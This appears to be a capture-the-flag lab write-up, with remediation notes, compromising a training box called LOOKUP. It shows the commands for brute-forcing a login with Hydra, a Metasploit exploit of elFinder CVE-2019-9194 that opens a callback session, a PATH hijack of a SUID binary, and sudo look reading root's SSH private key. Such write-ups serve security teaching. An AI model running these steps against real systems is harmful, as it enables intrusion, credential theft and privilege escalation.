Case file

Login oracle, elFinder RCE, and sudo look key theft

Intermediate web engagement: Hydra against a login oracle found jose; elFinder CVE-2019-9194 yielded www-data; SUID pwm PATH hijack unlocked think; sudo look read root’s SSH private key.

Intermediate28 minWeb · elFinder · SSH · Privilege Escalation
  • Differential login errors enabled username discovery. elFinder 2.1.47 on a files vhost accepted Metasploit RCE. pwm and sudo look moved from www-data to think to root via a stolen id_rsa.

  • Hydra found jose. Metasploit against files.lookup.thm/elFinder returned a www-data session.

  • Forged /tmp/id so pwm dumped think’s password list; Hydra recovered SSH credentials.

  • NOPASSWD look against /root/.ssh/id_rsa produced a key for root SSH.

01

Engagement summary

Differential login errors enabled username discovery. elFinder 2.1.47 on a files vhost accepted Metasploit RCE. pwm and sudo look moved from www-data to think to root via a stolen id_rsa.

LOOKUP (10.10.80.211 / lookup.thm) hosted a login that distinguished invalid users from invalid passwords. Hydra with a name list recovered jose:password123 and redirected us to files.lookup.thm running elFinder 2.1.47. We exploited CVE-2019-9194 (exiftran command injection in the PHP connector) via Metasploit for a www-data shell. SUID /usr/sbin/pwm invoked id from PATH then dumped think’s password file; forging id output and spraying the list yielded think:josemario.AKA(think) over SSH. sudo -l allowed /usr/bin/look, which GTFOBins-style read /root/.ssh/id_rsa for root SSH.

Business impact

User-enumeration oracles accelerate credential attacks. Unpatched elFinder is RCE on file-manager vhosts. SUID helpers that trust PATH and sudo look over sensitive files turn local access into root. Fix login messaging, patch or remove elFinder, rewrite pwm with absolute paths, and never grant look/read helpers against /root.

02

Login oracle and elFinder RCE

Hydra found jose. Metasploit against files.lookup.thm/elFinder returned a www-data session.

OPERATOR · HYDRA

savvy@lab:~$ echo '10.10.80.211 lookup.thm files.lookup.thm' | sudo tee -a /etc/hosts

savvy@lab:~$ hydra -L names.txt -p password123 lookup.thm http-post-form "/login.php:username=^USER^&password=^PASS^:F=try again"

[80][http-post-form] host: lookup.thm login: jose password: password123

OPERATOR · ELFINDER

savvy@lab:~$ msfconsole -q

msf6 > use exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection

msf6 > set RHOSTS files.lookup.thm

msf6 > set TARGETURI /elFinder/

msf6 > set LHOST tun0

msf6 > run

Meterpreter session opened

savvy@lab:/var/www$

03

SUID pwm PATH hijack to think

Forged /tmp/id so pwm dumped think’s password list; Hydra recovered SSH credentials.

OPERATOR · PWM

savvy@lab:~$ find / -perm /4000 2>/dev/null

/usr/sbin/pwm

savvy@lab:~$ printf '#!/bin/bash\necho "uid=33(think) gid=33(think) groups=33(think)"\n' > /tmp/id && chmod +x /tmp/id

savvy@lab:~$ export PATH=/tmp:$PATH && /usr/sbin/pwm

# dumps /home/think/.passwords

savvy@lab:~$ hydra -l think -P wordlist.txt ssh://lookup.thm

[22][ssh] login: think password: josemario.AKA(think)

savvy@lab:~$ ssh think@lookup.thm

savvy@lab:~$

04

sudo look to root SSH key

NOPASSWD look against /root/.ssh/id_rsa produced a key for root SSH.

OPERATOR · LOOK

savvy@lab:~$ sudo -l

(ALL) NOPASSWD: /usr/bin/look

savvy@lab:~$ sudo look '' /root/.ssh/id_rsa

-----BEGIN OPENSSH PRIVATE KEY-----

savvy@lab:~$ chmod 600 id_rsa && ssh -i id_rsa root@lookup.thm

root@lab:~# id

uid=0(root) gid=0(root) groups=0(root)

Remediation

Normalize login error messages. Patch elFinder past CVE-2019-9194 or remove it. Drop SUID from pwm; use absolute paths. Remove look from sudoers — use least-privilege file ACLs instead.